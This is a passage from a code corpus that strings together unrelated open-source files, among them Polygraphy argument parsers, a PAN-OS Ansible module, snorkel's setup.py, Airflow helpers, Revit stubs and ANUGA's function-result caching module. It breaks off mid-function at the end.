use_instead=": as a separator and write shapes in the form [dim0,...,dimN]",
name="Using , as a separator",
)
def parse_meta_legacy(meta_args, includes_shape=True, includes_dtype=True):
"""
Parses a list of tensor metadata arguments of the form "<name>,<shape>,<dtype>"
`shape` and `dtype` are optional, but `dtype` must always come after `shape` if they are both enabled.
Args:
meta_args (List[str]): A list of tensor metadata arguments from the command-line.
includes_shape (bool): Whether the arguments include shape information.
includes_dtype (bool): Whether the arguments include dtype information.
Returns:
TensorMetadata: The parsed tensor metadata.
"""
SEP = ","
SHAPE_SEP = "x"
meta = TensorMetadata()
for orig_tensor_meta_arg in meta_args:
tensor_meta_arg = orig_tensor_meta_arg
def pop_meta(name):
nonlocal tensor_meta_arg
tensor_meta_arg, _, val = tensor_meta_arg.rpartition(SEP)
if not tensor_meta_arg:
G_LOGGER.critical(
"Could not parse {:} from argument: {:}. Is it separated by a comma "
"(,) from the tensor name?".format(name, orig_tensor_meta_arg)
)
if val.lower() == "auto":
val = None
return val
def parse_dtype(dtype):
if dtype is not None:
dtype = np_type_from_str(dtype)
return dtype
def parse_shape(shape):
if shape is not None:
def parse_shape_dim(buf):
try:
buf = int(buf)
except:
pass
return buf
parsed_shape = []
# Allow for quoted strings in shape dimensions
in_quotes = False
buf = ""
for char in shape.lower():
if char in ['"', "'"]:
in_quotes = not in_quotes
elif not in_quotes and char == SHAPE_SEP:
parsed_shape.append(parse_shape_dim(buf))
buf = ""
else:
buf += char
# For the last dimension
if buf:
parsed_shape.append(parse_shape_dim(buf))
shape = tuple(parsed_shape)
return shape
name = None
dtype = None
shape = None
if includes_dtype:
dtype = parse_dtype(pop_meta("data type"))
if includes_shape:
shape = parse_shape(pop_meta("shape"))
name = tensor_meta_arg
meta.add(name, dtype, shape)
new_style = []
for m_arg in meta_args:
arg = m_arg
if includes_shape:
arg = arg.replace(",", ":[", 1)
if includes_dtype:
arg = arg.replace(",", "]:", 1)
else:
arg += "]"
arg = arg.replace(",auto", ":auto")
arg = arg.replace(",", ":")
if includes_shape:
arg = arg.replace("x", ",")
new_style.append(arg)
G_LOGGER.warning(
"The old shape syntax is deprecated and will be removed in a future version of Polygraphy\n"
"See the CHANGELOG for the motivation behind this deprecation.",
mode=LogMode.ONCE,
)
G_LOGGER.warning("Instead of: '{:}', use: '{:}'\n".format(" ".join(meta_args), " ".join(new_style)))
return meta
def parse_meta_new_impl(meta_args, includes_shape=True, includes_dtype=True):
SEP = ":"
meta = TensorMetadata()
for meta_arg in meta_args:
name, shape, dtype = None, None, None
def pop_meta(func):
nonlocal meta_arg
meta_arg, _, val = meta_arg.rpartition(SEP)
val = cast(val.strip())
if isinstance(val, str) and val.lower() == "auto":
return None
return func(val)
if includes_dtype:
dtype = pop_meta(func=np_type_from_str)
if includes_shape:
shape = pop_meta(func=lambda s: tuple(e for e in s if e != ""))
name = meta_arg
meta.add(name, dtype=dtype, shape=shape)
return meta
@mod.export()
def parse_meta(meta_args, includes_shape=True, includes_dtype=True):
"""
Parses a list of tensor metadata arguments of the form "<name>:<shape>:<dtype>"
`shape` and `dtype` are optional, but `dtype` must always come after `shape` if they are both enabled.
Args:
meta_args (List[str]): A list of tensor metadata arguments from the command-line.
includes_shape (bool): Whether the arguments include shape information.
includes_dtype (bool): Whether the arguments include dtype information.
Returns:
TensorMetadata: The parsed tensor metadata.
"""
if all((includes_shape and "[" in arg) or (includes_dtype and "," not in arg) for arg in meta_args):
return parse_meta_new_impl(meta_args, includes_shape, includes_dtype)
return parse_meta_legacy(meta_args, includes_shape, includes_dtype)
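# A hedged usage sketch for ``parse_meta``; the described result is an assumption
# based on the docstrings above (the exact TensorMetadata representation may differ):
# parse_meta(["input:[1,3,224,224]:float32"]) describes a tensor named "input"
# with shape (1, 3, 224, 224) and dtype float32.
# parse_meta(["input:[1,3,224,224]"], includes_dtype=False) describes the same
# tensor with the dtype left unspecified.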
@mod.export()
def parse_num_bytes(num_bytes_arg):
"""
Parses an argument that indicates a number of bytes. The argument may use scientific notation,
or contain a `K`, `M`, or `G` suffix (case-insensitive), indicating `KiB`, `MiB`, or `GiB` respectively.
If the number is fractional, it will be truncated to an integer value.
If the provided argument is `None`, `None` is returned.
Args:
num_bytes_arg (str): The argument indicating the number of bytes.
Returns:
int: The number of bytes.
"""
if num_bytes_arg is None:
return None
num_component = num_bytes_arg # Numerical component of the argument
multiplier = 1
suffix_multiplier = {"K": 1 << 10, "M": 1 << 20, "G": 1 << 30}
for suffix, mult in suffix_multiplier.items():
if num_bytes_arg.upper().endswith(suffix):
num_component = num_bytes_arg.upper().rstrip(suffix)
multiplier = mult
break
try:
return int(float(num_component) * multiplier)
except:
G_LOGGER.critical(
"Could not convert {:} to a number of bytes. "
"Please use either an integer (e.g. 16000000), scientific notation (e.g. 16e6), "
"or a number with a valid suffix: K, M, or G (e.g. 16M).".format(num_bytes_arg)
)
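# Hedged examples for ``parse_num_bytes``; the expected values follow from the
# docstring and are illustrative assumptions, not recorded output:
# parse_num_bytes("16M") -> 16777216 (16 * (1 << 20))
# parse_num_bytes("1.5K") -> 1536 (fractional values are truncated)
# parse_num_bytes("16e6") -> 16000000 (scientific notation)
# parse_num_bytes(None) -> None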
|
plugins/modules/panos_log_forwarding_profile.py | EverOps/pan-os-ansible | 130 | 11195822 | <gh_stars>100-1000
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2019 Palo Alto Networks, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = """
---
module: panos_log_forwarding_profile
short_description: Manage log forwarding profiles.
description:
- Manages log forwarding profiles.
author: "<NAME> (@shinmog)"
version_added: '1.0.0'
requirements:
- pan-python
- pandevice >= 0.11.1
notes:
- Panorama is supported.
- Check mode is supported.
extends_documentation_fragment:
- paloaltonetworks.panos.fragments.transitional_provider
- paloaltonetworks.panos.fragments.vsys_shared
- paloaltonetworks.panos.fragments.device_group
- paloaltonetworks.panos.fragments.state
options:
name:
description:
- Name of the profile.
type: str
required: true
description:
description:
- Profile description
type: str
enhanced_logging:
description:
- Valid for PAN-OS 8.1+
- Enabling enhanced application logging.
type: bool
"""
EXAMPLES = """
# Create a profile
- name: Create log forwarding profile
panos_log_forwarding_profile:
provider: '{{ provider }}'
name: 'my-profile'
enhanced_logging: true
"""
RETURN = """
# Default return values
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.paloaltonetworks.panos.plugins.module_utils.panos import (
get_connection,
)
try:
from panos.errors import PanDeviceError
from panos.objects import LogForwardingProfile
except ImportError:
try:
from pandevice.errors import PanDeviceError
from pandevice.objects import LogForwardingProfile
except ImportError:
pass
def main():
helper = get_connection(
vsys_shared=True,
device_group=True,
with_state=True,
with_classic_provider_spec=True,
min_pandevice_version=(0, 11, 1),
min_panos_version=(8, 0, 0),
argument_spec=dict(
name=dict(required=True),
description=dict(),
enhanced_logging=dict(type="bool"),
),
)
module = AnsibleModule(
argument_spec=helper.argument_spec,
supports_check_mode=True,
required_one_of=helper.required_one_of,
)
# Verify imports, build pandevice object tree.
parent = helper.get_pandevice_parent(module)
try:
listing = LogForwardingProfile.refreshall(parent)
except PanDeviceError as e:
module.fail_json(msg="Failed refresh: {0}".format(e))
spec = {
"name": module.params["name"],
"description": module.params["description"],
"enhanced_logging": module.params["enhanced_logging"],
}
obj = LogForwardingProfile(**spec)
parent.add(obj)
changed, diff = helper.apply_state(obj, listing, module)
module.exit_json(changed=changed, diff=diff, msg="Done")
if __name__ == "__main__":
main()
|
setup.py | melonwater211/snorkel | 2,323 | 11195847 | <filename>setup.py
from typing import Dict
from setuptools import find_packages, setup
# version.py defines the VERSION and VERSION_SHORT variables.
# We use exec here so we don't import snorkel.
VERSION: Dict[str, str] = {}
with open("snorkel/version.py", "r") as version_file:
exec(version_file.read(), VERSION)
# Use README.md as the long_description for the package
with open("README.md", "r") as readme_file:
long_description = readme_file.read()
setup(
name="snorkel",
version=VERSION["VERSION"],
url="https://github.com/snorkel-team/snorkel",
description="A system for quickly generating training data with weak supervision",
long_description_content_type="text/markdown",
long_description=long_description,
license="Apache License 2.0",
classifiers=[
"Intended Audience :: Science/Research",
"Topic :: Scientific/Engineering :: Information Analysis",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 3",
],
project_urls={
"Homepage": "https://snorkel.org",
"Source": "https://github.com/snorkel-team/snorkel/",
"Bug Reports": "https://github.com/snorkel-team/snorkel/issues",
"Citation": "https://doi.org/10.14778/3157794.3157797",
},
packages=find_packages(exclude=("test*",)),
include_package_data=True,
install_requires=[
"munkres>=1.0.6",
"numpy>=1.16.5,<1.20.0",
"scipy>=1.2.0,<2.0.0",
"pandas>=1.0.0,<2.0.0",
"tqdm>=4.33.0,<5.0.0",
"scikit-learn>=0.20.2,<0.25.0",
"torch>=1.2.0,<2.0.0",
"tensorboard>=2.0.0,<2.7.0",
"networkx>=2.2,<2.6",
],
python_requires=">=3.6",
keywords="machine-learning ai weak-supervision",
)
|
lib_pypy/_cffi_ssl/_cffi_src/openssl/nid.py | nanjekyejoannah/pypy | 333 | 11195857 | # This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
INCLUDES = """
#include <openssl/obj_mac.h>
"""
TYPES = """
static const int Cryptography_HAS_X25519;
static const int Cryptography_HAS_X448;
static const int Cryptography_HAS_ED448;
static const int Cryptography_HAS_ED25519;
static const int Cryptography_HAS_POLY1305;
static const int NID_undef;
static const int NID_pbe_WithSHA1And3_Key_TripleDES_CBC;
static const int NID_X25519;
static const int NID_X448;
static const int NID_ED25519;
static const int NID_ED448;
static const int NID_poly1305;
static const int NID_X9_62_prime256v1;
static const int NID_info_access;
static const int NID_subject_alt_name;
static const int NID_crl_distribution_points;
static const int NID_crl_reason;
static const int NID_ad_OCSP;
static const int NID_ad_ca_issuers;
"""
FUNCTIONS = """
"""
CUSTOMIZATIONS = """
#ifndef NID_X25519
static const long Cryptography_HAS_X25519 = 0;
static const int NID_X25519 = 0;
#else
static const long Cryptography_HAS_X25519 = 1;
#endif
#ifndef NID_ED25519
static const long Cryptography_HAS_ED25519 = 0;
static const int NID_ED25519 = 0;
#else
static const long Cryptography_HAS_ED25519 = 1;
#endif
#ifndef NID_X448
static const long Cryptography_HAS_X448 = 0;
static const int NID_X448 = 0;
#else
static const long Cryptography_HAS_X448 = 1;
#endif
#ifndef NID_ED448
static const long Cryptography_HAS_ED448 = 0;
static const int NID_ED448 = 0;
#else
static const long Cryptography_HAS_ED448 = 1;
#endif
#ifndef NID_poly1305
static const long Cryptography_HAS_POLY1305 = 0;
static const int NID_poly1305 = 0;
#else
static const long Cryptography_HAS_POLY1305 = 1;
#endif
"""
|
dags/utils.py | Akash-Dutta/DataEngineering | 190 | 11195858 | <filename>dags/utils.py
import os
from airflow.hooks.S3_hook import S3Hook
from airflow.hooks.postgres_hook import PostgresHook
import psycopg2
def _local_to_s3(
bucket_name: str, key: str, file_name: str, remove_local: bool = False
) -> None:
s3 = S3Hook()
s3.load_file(filename=file_name, bucket_name=bucket_name, replace=True, key=key)
if remove_local:
if os.path.isfile(file_name):
os.remove(file_name)
def run_redshift_external_query(qry: str) -> None:
rs_hook = PostgresHook(postgres_conn_id="redshift")
rs_conn = rs_hook.get_conn()
rs_conn.set_isolation_level(psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT)
rs_cursor = rs_conn.cursor()
rs_cursor.execute(qry)
rs_cursor.close()
rs_conn.commit()
|
tests/foundations/environments/test_plan.py | IuryAlves/cloud-foundation-fabric | 203 | 11195876 | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pytest
FIXTURES_DIR = os.path.join(os.path.dirname(__file__), 'fixture')
def test_folder_roles(e2e_plan_runner):
"Test folder roles."
modules, _ = e2e_plan_runner(FIXTURES_DIR, refresh=False)
for env in ['test', 'prod']:
resources = modules[f'module.test.module.environment-folders["{env}"]']
folders = [r for r in resources if r['type'] == 'google_folder']
assert len(folders) == 1
folder = folders[0]
assert folder['values']['display_name'] == env
bindings = [r['index']
for r in resources if r['type'] == 'google_folder_iam_binding']
assert len(bindings) == 5
def test_org_roles(e2e_plan_runner):
"Test folder roles."
tf_vars = {
'organization_id': 'organizations/123',
'iam_xpn_config': '{grant = true, target_org = true}'
}
modules, _ = e2e_plan_runner(FIXTURES_DIR, refresh=False, **tf_vars)
for env in ['test', 'prod']:
resources = modules[f'module.test.module.environment-folders["{env}"]']
folder_bindings = [r['index']
for r in resources if r['type'] == 'google_folder_iam_binding']
assert len(folder_bindings) == 4
resources = modules[f'module.test.module.tf-service-accounts["{env}"]']
org_bindings = [r for r in resources
if r['type'] == 'google_organization_iam_member']
assert len(org_bindings) == 2
assert {b['values']['role'] for b in org_bindings} == {
'roles/resourcemanager.organizationViewer',
'roles/compute.xpnAdmin'
}
|
tkinter/__frame__/replace-frame-with-content/main-v2-lambda.py | whitmans-max/python-examples | 140 | 11195884 | <gh_stars>100-1000
# date: 2019.05.04
# author: Bartłomiej 'furas' Burek
import tkinter as tk
# --- functions ---
def change_frame(new_frame):
global current
# hide current tk.Frame
current.pack_forget()
# show new tk.Frame
current = new_frame
current.pack()
# --- main ---
root = tk.Tk()
# --- main frame without .pack() ---
main_frame = tk.Frame(root)
button = tk.Button(main_frame, text="Frame #1", command=lambda:change_frame(frame_1))
button.pack()
button = tk.Button(main_frame, text="Frame #2", command=lambda:change_frame(frame_2))
button.pack()
# --- frame #1 without .pack() ---
frame_1 = tk.Frame(root)
l = tk.Label(frame_1, text="It is Frame #1", bg='red')
l.pack()
b = tk.Button(frame_1, text="BACK", command=lambda:change_frame(main_frame))
b.pack()
# --- frame #2 without .pack() ---
frame_2 = tk.Frame(root)
l = tk.Label(frame_2, text="It is Frame #2", bg='green')
l.pack()
b = tk.Button(frame_2, text="BACK", command=lambda:change_frame(main_frame))
b.pack()
# --- set frame at start ---
current = main_frame
current.pack()
root.mainloop()
|
release/stubs.min/Autodesk/Revit/DB/__init___parts/SpatialElementGeometryResults.py | htlcnn/ironpython-stubs | 182 | 11195887 | class SpatialElementGeometryResults(object,IDisposable):
""" The results of spatial element geometry calculation. """
def Dispose(self):
""" Dispose(self: SpatialElementGeometryResults) """
pass
def GetBoundaryFaceInfo(self,face):
"""
GetBoundaryFaceInfo(self: SpatialElementGeometryResults,face: Face) -> IList[SpatialElementBoundarySubface]
Query the spatial element boundary face information with the given face.
face: The face from the spatial element's geometry.
Returns: Sub-faces related to the room bounding elements that define the spatial element
face. Returns ll if there is no corresponding boundary information with the
given face.
"""
pass
def GetGeometry(self):
"""
GetGeometry(self: SpatialElementGeometryResults) -> Solid
The solid from the spatial element.
Returns: Requested solid.
"""
pass
def ReleaseUnmanagedResources(self,*args):
""" ReleaseUnmanagedResources(self: SpatialElementGeometryResults,disposing: bool) """
pass
def __enter__(self,*args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self,*args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __repr__(self,*args):
""" __repr__(self: object) -> str """
pass
IsValidObject=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Specifies whether the .NET object represents a valid Revit entity.
Get: IsValidObject(self: SpatialElementGeometryResults) -> bool
"""
|
anuga/caching/caching.py | samcom12/anuga_core | 136 | 11195892 | # =============================================================================
# caching.py - Supervised caching of function results.
# Copyright (C) 1999, 2000, 2001, 2002 <NAME>
# Australian National University (1999-2003)
# Geoscience Australia (2003-present)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License (http://www.gnu.org/copyleft/gpl.html)
# for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
#
#
# Contact address: <EMAIL>
#
# Version 1.5.6 February 2002
# =============================================================================
"""Module caching.py - Supervised caching of function results.
Public functions:
cache(my_F,args) -- Cache values returned from callable object my_F given args.
cachestat() -- Reports statistics about cache hits and time saved.
test() -- Conducts a basic test of the caching functionality.
See doc strings of individual functions for detailed documentation.
"""
from __future__ import division
# -----------------------------------------------------------------------------
# Initialisation code
# Determine platform
#
from builtins import zip
from builtins import input
from builtins import str
from builtins import range
from past.builtins import basestring
from past.utils import old_div
from os import getenv
import collections
import inspect
import types
import time
import sys
import os
if os.name in ['nt', 'dos', 'win32', 'what else?']:
unix = False
else:
unix = True
import anuga.utilities.log as log
from anuga.utilities import system_tools
import numpy as num
#from future
cache_dir = '.python_cache'
# Make default caching directory name
# We are changing the 'data directory' environment variable from
# INUNDATIONHOME to ANUGADATA - this gives a changeover.
if unix:
homedir = getenv('ANUGADATA')
if not homedir:
homedir = getenv('INUNDATIONHOME')
if not homedir:
homedir = '~'
else:
# Since homedir will be a group area, individually label the caches
user = getenv('LOGNAME')
if user is not None:
cache_dir += '_' + user
CR = '\n'
else:
homedir = 'c:'
CR = '\r\n' #FIXME: Not tested under windows
cachedir = os.path.join(homedir, cache_dir)
# It turns out hashes are no longer stable under Python3 (grr).
# https://stackoverflow.com/questions/27522626/hash-function-in-python-3-3-returns-different-results-between-sessions
# https://stackoverflow.com/questions/30585108/disable-hash-randomization-from-within-python-program
#
# The fix is to use another hashing library.
if system_tools.major_version == 3:
import hashlib
def hash(x):
res = hashlib.sha256(str(x).encode()).hexdigest()
#print('MY:', x, res)
return res
# -----------------------------------------------------------------------------
# Options directory with default values - to be set by user
#
options = {
'cachedir': cachedir, # Default cache directory
'maxfiles': 1000000, # Maximum number of cached files
'savestat': True, # Log caching info to stats file
'verbose': True, # Write messages to standard output
'bin': True, # Use binary format (more efficient)
'compression': True, # Use zlib compression
'bytecode': True, # Recompute if bytecode has changed
'expire': False # Automatically remove files that have been accessed
# least recently
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def set_option(key, value):
"""Function to set values in the options directory.
USAGE:
set_option(key, value)
ARGUMENTS:
key -- Key in options dictionary. (Required)
value -- New value for key. (Required)
DESCRIPTION:
Function to set values in the options directory.
Raises an exception if key is not in options.
"""
if key in options:
options[key] = value
else:
raise KeyError(key) # Key not found, raise an exception
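# Hedged examples mirroring the docstring and the keys defined in ``options``:
# set_option('verbose', False) # silence caching messages
# set_option('compression', 0) # store cached results uncompressed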
# -----------------------------------------------------------------------------
# Function cache - the main routine
def cache(my_F,
args=(),
kwargs={},
dependencies=None,
cachedir=None,
verbose=None,
compression=None,
evaluate=False,
test=False,
clear=False,
return_filename=False):
"""Supervised caching of function results. Also known as memoization.
USAGE:
result = cache(my_F, args, kwargs, dependencies, cachedir, verbose,
compression, evaluate, test, return_filename)
ARGUMENTS:
my_F -- Callable object (Required)
args -- Arguments to my_F (Default: ())
kwargs -- Keyword arguments to my_F (Default: {})
dependencies -- Filenames that my_F depends on (Default: None)
cachedir -- Directory for cache files (Default: options['cachedir'])
verbose -- Flag verbose output to stdout
(Default: options['verbose'])
compression -- Flag zlib compression (Default: options['compression'])
evaluate -- Flag forced evaluation of my_F (Default: False)
test -- Flag test for cached results (Default: False)
clear -- Flag delete cached results (Default: False)
return_filename -- Flag return of cache filename (Default: False)
DESCRIPTION:
A Python function call of the form
result = my_F(arg1,...,argn)
can be replaced by
from caching import cache
result = cache(my_F,(arg1,...,argn))
The latter form returns the same output as the former but reuses cached
results if the function has been computed previously in the same context.
'result' and the arguments can be simple types, tuples, list, dictionaries or
objects, but not unhashable types such as functions or open file objects.
The function 'my_F' may be a member function of an object or a module.
This type of caching is particularly useful for computationally intensive
functions with few frequently used combinations of input arguments. Note that
if the inputs or output are very large caching might not save time because
disc access may dominate the execution time.
If the function definition changes after a result has been cached it will be
detected by examining the functions bytecode (co_code, co_consts,
func_defaults, co_argcount) and it will be recomputed.
LIMITATIONS:
1 Caching uses function(*args, **kwargs) to evaluate and will work
with anything that can be pickled, so any limitation in function(,)
or pickle extends to caching.
2 A function to be cached should not depend on global variables
as wrong results may occur if globals are changed after a result has
been cached.
-----------------------------------------------------------------------------
Additional functionality:
Keyword args
Keyword arguments (kwargs) can be added as a dictionary of keyword: value
pairs, following Python's 'extended call syntax'.
A Python function call of the form
result = my_F(arg1,...,argn, kwarg1=val1,...,kwargm=valm)
is then cached as follows
from caching import cache
result = cache(my_F,(arg1,...,argn), {kwarg1:val1,...,kwargm:valm})
The default value of kwargs is {}
Explicit dependencies:
The call
cache(my_F,(arg1,...,argn), dependencies = <list of filenames>)
Checks the size, creation time and modification time of each listed file.
If any file has changed the function is recomputed and the results stored
again.
Specify caching directory:
The call
cache(my_F,(arg1,...,argn), cachedir = <cachedir>)
designates <cachedir> where cached data are stored. Use ~ to indicate users
home directory - not $HOME. The default is ~/.python_cache on a UNIX
platform and c:/.python_cache on a Win platform.
Silent operation:
The call
cache(my_F,(arg1,...,argn), verbose=False)
suppresses messages to standard output.
Compression:
The call
cache(my_F,(arg1,...,argn), compression=False)
disables compression. (Default: compression=True). If the requested compressed
or uncompressed file is not there, it'll try the other version.
Forced evaluation:
The call
cache(my_F,(arg1,...,argn), evaluate=True)
forces the function to evaluate even though cached data may exist.
Testing for presence of cached result:
The call
cache(my_F,(arg1,...,argn), test=True)
retrieves cached result if it exists, otherwise None. The function will not
be evaluated. If both evaluate and test are switched on, evaluate takes
precedence.
??NOTE: In case of hash collisions, this may return the wrong result as
??it only checks if *a* cached result is present.
# I think this was due to the bytecode option being False for some reason. (23/1/2009).
Obtain cache filenames:
The call
cache(my_F,(arg1,...,argn), return_filename=True)
returns the hashed base filename under which this function and its
arguments would be cached
Clearing cached results:
The call
cache(my_F,'clear')
clears all cached data for 'my_F' and
cache('clear')
clears all cached data.
NOTE: The string 'clear' can be passed an *argument* to my_F using
cache(my_F,('clear',)) or cache(my_F,tuple(['clear'])).
New form of clear:
cache(my_F,(arg1,...,argn), clear=True)
clears cached data for particular combination my_F and args
"""
# Imports and input checks
#
import time, string
if not cachedir:
cachedir = options['cachedir']
if verbose is None: # Do NOT write 'if not verbose:', it could be zero.
verbose = options['verbose']
if compression is None: # Do NOT write 'if not compression:',
# it could be zero.
compression = options['compression']
# Create cache directory if needed
CD = checkdir(cachedir,verbose)
# Handle the case cache('clear')
if isinstance(my_F, basestring):
if my_F.lower() == 'clear':
clear_cache(CD,verbose=verbose)
return
# Handle the case cache(my_F, 'clear')
if isinstance(args, basestring):
if args.lower() == 'clear':
clear_cache(CD,my_F,verbose=verbose)
return
# Force singleton arg into a tuple
if not isinstance(args, tuple):
args = tuple([args])
# Check that kwargs is a dictionary
if not isinstance(kwargs, dict):
raise TypeError
# Hash arguments (and keyword args) to integer
arghash = myhash((args, kwargs))
# Get sizes and timestamps for files listed in dependencies.
# Force singletons into a tuple.
if dependencies and not isinstance(dependencies, (tuple, list)):
dependencies = tuple([dependencies])
deps = get_depstats(dependencies)
# Extract function name from my_F object
funcname = get_funcname(my_F)
# Create cache filename
FN = funcname+'_'+str(arghash)
#print()
#print('FN', FN)
#print('repr(arghash)', repr(arghash))
#print('arghash', arghash)
#print()
if return_filename:
return(FN)
if clear:
for file_type in file_types:
file_name = CD+FN+'_'+file_type
for fn in [file_name, file_name + '.z']:
if os.access(fn, os.F_OK):
if unix:
os.remove(fn)
else:
# FIXME: os.remove doesn't work under windows
os.system('del '+fn)
if verbose is True:
log.critical('MESSAGE (caching): File %s deleted' % fn)
##else:
## log.critical('%s was not accessed' % fn)
return None
#-------------------------------------------------------------------
# Check if previous computation has been cached
if evaluate is True:
Retrieved = None # Force evaluation of my_F regardless of caching status.
reason = 5
else:
T, FN, Retrieved, reason, comptime, loadtime, compressed = \
CacheLookup(CD, FN, my_F,
args, kwargs,
deps,
verbose,
compression,
dependencies)
if not Retrieved:
if test: # Do not attempt to evaluate function
T = None
else: # Evaluate function and save to cache
if verbose is True:
msg1(funcname, args, kwargs,reason)
# Remove expired files automatically
if options['expire']:
DeleteOldFiles(CD,verbose)
# Save args before function is evaluated in case
# they are modified by function
save_args_to_cache(CD,FN,args,kwargs,compression)
# Execute and time function with supplied arguments
t0 = time.time()
T = my_F(*args, **kwargs) # Built-in 'apply' deprecated in Py3K
#comptime = round(time.time()-t0)
comptime = time.time()-t0
if verbose is True:
msg2(funcname,args,kwargs,comptime,reason)
# Save results and estimated loading time to cache
loadtime = save_results_to_cache(T, CD, FN, my_F, deps, comptime, \
funcname, dependencies, compression)
if verbose is True:
msg3(loadtime, CD, FN, deps, compression)
compressed = compression
if options['savestat'] and (not test or Retrieved):
##if options['savestat']:
addstatsline(CD,funcname,FN,Retrieved,reason,comptime,loadtime,compressed)
return(T) # Return results in all cases
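# A minimal, hedged usage sketch for ``cache``; ``expensive_simulation`` is a
# hypothetical function used purely for illustration:
#
# from anuga.caching.caching import cache
#
# def expensive_simulation(n):
#     return sum(i * i for i in range(n))
#
# result = cache(expensive_simulation, (10**6,)) # computed and stored
# result = cache(expensive_simulation, (10**6,)) # retrieved from the cache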
# -----------------------------------------------------------------------------
def cachestat(sortidx=4, period=-1, showuser=None, cachedir=None):
"""Generate statistics of caching efficiency.
USAGE:
cachestat(sortidx, period, showuser, cachedir)
ARGUMENTS:
sortidx -- Index of field by which lists are (default: 4)
Legal values are
0: 'Name'
1: 'Hits'
2: 'CPU'
3: 'Time Saved'
4: 'Gain(%)'
5: 'Size'
period -- If set to -1 all available caching history is used.
If set 0 only the current month is used (default -1).
showuser -- Flag for additional table showing user statistics
(default: None).
cachedir -- Directory for cache files (default: options['cachedir']).
DESCRIPTION:
Logged caching statistics is converted into summaries of the form
--------------------------------------------------------------------------
Function Name Hits Exec(s) Cache(s) Saved(s) Gain(%) Size
--------------------------------------------------------------------------
"""
__cachestat(sortidx, period, showuser, cachedir)
return
# -----------------------------------------------------------------------------
# Has mostly been moved to proper unit test.
# What remains here includes an example of the
# cache statistics form.
def test(cachedir=None, verbose=False, compression=None):
"""Test the functionality of caching.
USAGE:
test(verbose)
ARGUMENTS:
verbose -- Flag whether caching will output its statistics (default=False)
cachedir -- Directory for cache files (Default: options['cachedir'])
compression -- Flag zlib compression (Default: options['compression'])
"""
import string, time
# Initialise
#
#import caching
#reload(caching)
if not cachedir:
cachedir = options['cachedir']
if verbose is None: # Do NOT write 'if not verbose:', it could be zero.
verbose = options['verbose']
if compression is None: # Do NOT write 'if not compression:',
# it could be zero.
compression = options['compression']
else:
try:
set_option('compression', compression)
except:
logtesterror('Set option failed')
try:
import zlib
except:
log.critical()
log.critical('*** Could not find zlib, default to no-compression ***')
log.critical('*** Installing zlib will improve performance of caching ***')
log.critical()
compression = 0
set_option('compression', compression)
log.critical('\nTesting caching module - please stand by\n')
# Define a test function to be cached
#
def f(a,b,c,N,x=0,y='abcdefg'):
"""f(a,b,c,N)
Do something time consuming and produce a complex result.
"""
import string
B = []
for n in range(N):
s = str(n+2.0/(n + 4.0))+'.a'*10
B.append((a,b,c,s,n,x,y))
return(B)
# Check that default cachedir is OK
#
CD = checkdir(cachedir,verbose)
# Make a dependency file
#
try:
DepFN = CD + 'testfile.tmp'
DepFN_wildcard = CD + 'test*.tmp'
Depfile = open(DepFN,'w')
Depfile.write('We are the knights who say NI!')
Depfile.close()
logtestOK('Wrote file %s' %DepFN)
except:
logtesterror('Could not open file %s for writing - check your environment' \
% DepFN)
# Check set_option (and switch stats off
#
try:
set_option('savestat',0)
assert(options['savestat'] == 0)
logtestOK('Set option')
except:
logtesterror('Set option failed')
# Make some test input arguments
#
N = 5000 #Make N fairly small here
a = [1,2]
b = ('Thou shalt count the number three',4)
c = {'Five is right out': 6, (7,8): 9}
x = 3
y = 'holy hand grenade'
# Test caching
#
if compression:
comprange = 2
else:
comprange = 1
for comp in range(comprange):
# Evaluate and store
#
try:
T1 = cache(f,(a,b,c,N), {'x':x, 'y':y}, evaluate=1, \
verbose=verbose, compression=comp)
if comp:
logtestOK('Caching evaluation with compression')
else:
logtestOK('Caching evaluation without compression')
except:
if comp:
logtesterror('Caching evaluation with compression failed - try caching.test(compression=0)')
else:
logtesterror('Caching evaluation failed - try caching.test(verbose=1)')
# Retrieve
#
try:
T2 = cache(f,(a,b,c,N), {'x':x, 'y':y}, verbose=verbose, \
compression=comp)
if comp:
logtestOK('Caching retrieval with compression')
else:
logtestOK('Caching retrieval without compression')
except:
if comp:
logtesterror('Caching retrieval with compression failed - try caching.test(compression=0)')
else:
logtesterror('Caching retrieval failed - try caching.test(verbose=1)')
# Reference result
#
T3 = f(a,b,c,N,x=x,y=y) # Compute without caching
if T1 == T2 and T2 == T3:
if comp:
